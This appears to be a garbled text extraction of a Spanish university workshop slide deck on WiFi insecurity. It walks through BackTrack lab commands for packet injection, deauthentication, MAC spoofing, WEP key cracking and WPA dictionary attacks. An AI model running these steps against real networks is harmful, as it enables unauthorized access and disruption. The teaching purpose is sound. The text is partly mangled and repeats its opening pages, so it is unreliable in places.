Upload File

taller-inseguridad wifi.pdf

94
7/16/2019 Taller-inSeguridad WIFI.pdf http://slidepdf.com/reader/full/taller-inseguridad-wifipdf 1/94 Taller: Conociendo la in Seguridad de las Redes WiFi (WLAN) Dr. Eduardo Ceh Varela [email protected]

Upload: mousepower

Post on 31-Oct-2015

68 views

Category:

Documents


2 download

Report

TRANSCRIPT

Page 1: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 194

Taller

Conociendo lain

Seguridadde las Redes WiFi (WLAN)

Dr Eduardo Ceh Varelaeduardocehutmetropolitanaedumx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 294

Objetivo

bull Utilizar herramientas de evaluacioacuten de seguridadpara conocer algunas de las vulnerabilidades de

las redes WiFi (WLAN)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 394

Atencioacuten

bull Las herramientas y teacutecnicas que se presentaraacuten eneste taller serviraacuten para conocer y evaluar lavulnerabilidad de una WLAN y asiacute desarrollar lamejor estrategia para remediar dichasvulnerabilidades

bull Estas herramientas y teacutecnicas no se deben deutilizar para fines ilegales y sin el

consentimiento de la institucioacuten a evaluar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 494

Agenda

bull Conceptos de Seguridadbull Conociendo BackTrack

bull Armando el Laboratorio

bull Seguridad WLAN

bull Saltaacutendose la autenticacioacuten WLAN

bull

Fallas de encripcioacuten WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 594

I- Conceptos de Seguridad

bull Seguridad ldquoGrado de proteccioacuten contra unpeligro dantildeo o peacuterdidardquo (Mike Pastore)

bull Se pretende tener ndash Confidencialidad

ndash Integridad

ndash Disponibilidad

bull Datos en proceso almacenados o en traacutensito

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694

Riesgo

bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida

bull El riesgo no se elimina

ndash

Aceptar el Riesgo ndash Minimizar el Riesgo

ndash Transferir el Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794

Amenaza

bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u

organizacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894

Amenazas

Password cracking

Man in the middle

Exploits

Denegacioacuten de servicio

Escalamiento de privilegios

Hacking de Centrales Telefoacutenicas

Keylogging Port scanning

Puertos vulnerables abiertos

Servicios de log inexistentes o que no son revisados

Desactualizacioacuten

Backups inexistentes

Uacuteltimos parches no instalados

Violacioacuten de la privacidad de los empleados

Destruccioacuten de equipamiento

Desastres naturales

Usuarios internos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994

Maacutes Amenazas

Captura de PC desde el exteriorViolacioacuten de contrasentildeas

Interrupcioacuten de los servicios

VirusMails anoacutenimos con agresiones

Incumplimiento de leyes y regulaciones

Robo o extraviacuteo de notebooks palms

Robo de informacioacuten

Destruccioacuten de soportes documentales

Acceso clandestino a redes

Intercepcioacuten de comunicaciones voz ywireless

Programas ldquobomba troyanosrdquo

Acceso indebido a documentos impresos

Agujeros de seguridad de redes conectadas

Falsificacioacuten de informacioacuten paraterceros

Indisponibilidad de informacioacuten clave

Spamming

Ingenieriacute a social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094

Vulnerabilidad

bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 2: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 294

Objetivo

bull Utilizar herramientas de evaluacioacuten de seguridadpara conocer algunas de las vulnerabilidades de

las redes WiFi (WLAN)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 394

Atencioacuten

bull Las herramientas y teacutecnicas que se presentaraacuten eneste taller serviraacuten para conocer y evaluar lavulnerabilidad de una WLAN y asiacute desarrollar lamejor estrategia para remediar dichasvulnerabilidades

bull Estas herramientas y teacutecnicas no se deben deutilizar para fines ilegales y sin el

consentimiento de la institucioacuten a evaluar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 494

Agenda

bull Conceptos de Seguridadbull Conociendo BackTrack

bull Armando el Laboratorio

bull Seguridad WLAN

bull Saltaacutendose la autenticacioacuten WLAN

bull

Fallas de encripcioacuten WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 594

I- Conceptos de Seguridad

bull Seguridad ldquoGrado de proteccioacuten contra unpeligro dantildeo o peacuterdidardquo (Mike Pastore)

bull Se pretende tener ndash Confidencialidad

ndash Integridad

ndash Disponibilidad

bull Datos en proceso almacenados o en traacutensito

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694

Riesgo

bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida

bull El riesgo no se elimina

ndash

Aceptar el Riesgo ndash Minimizar el Riesgo

ndash Transferir el Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794

Amenaza

bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u

organizacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894

Amenazas

Password cracking

Man in the middle

Exploits

Denegacioacuten de servicio

Escalamiento de privilegios

Hacking de Centrales Telefoacutenicas

Keylogging Port scanning

Puertos vulnerables abiertos

Servicios de log inexistentes o que no son revisados

Desactualizacioacuten

Backups inexistentes

Uacuteltimos parches no instalados

Violacioacuten de la privacidad de los empleados

Destruccioacuten de equipamiento

Desastres naturales

Usuarios internos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994

Maacutes Amenazas

Captura de PC desde el exteriorViolacioacuten de contrasentildeas

Interrupcioacuten de los servicios

VirusMails anoacutenimos con agresiones

Incumplimiento de leyes y regulaciones

Robo o extraviacuteo de notebooks palms

Robo de informacioacuten

Destruccioacuten de soportes documentales

Acceso clandestino a redes

Intercepcioacuten de comunicaciones voz ywireless

Programas ldquobomba troyanosrdquo

Acceso indebido a documentos impresos

Agujeros de seguridad de redes conectadas

Falsificacioacuten de informacioacuten paraterceros

Indisponibilidad de informacioacuten clave

Spamming

Ingenieriacute a social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094

Vulnerabilidad

bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

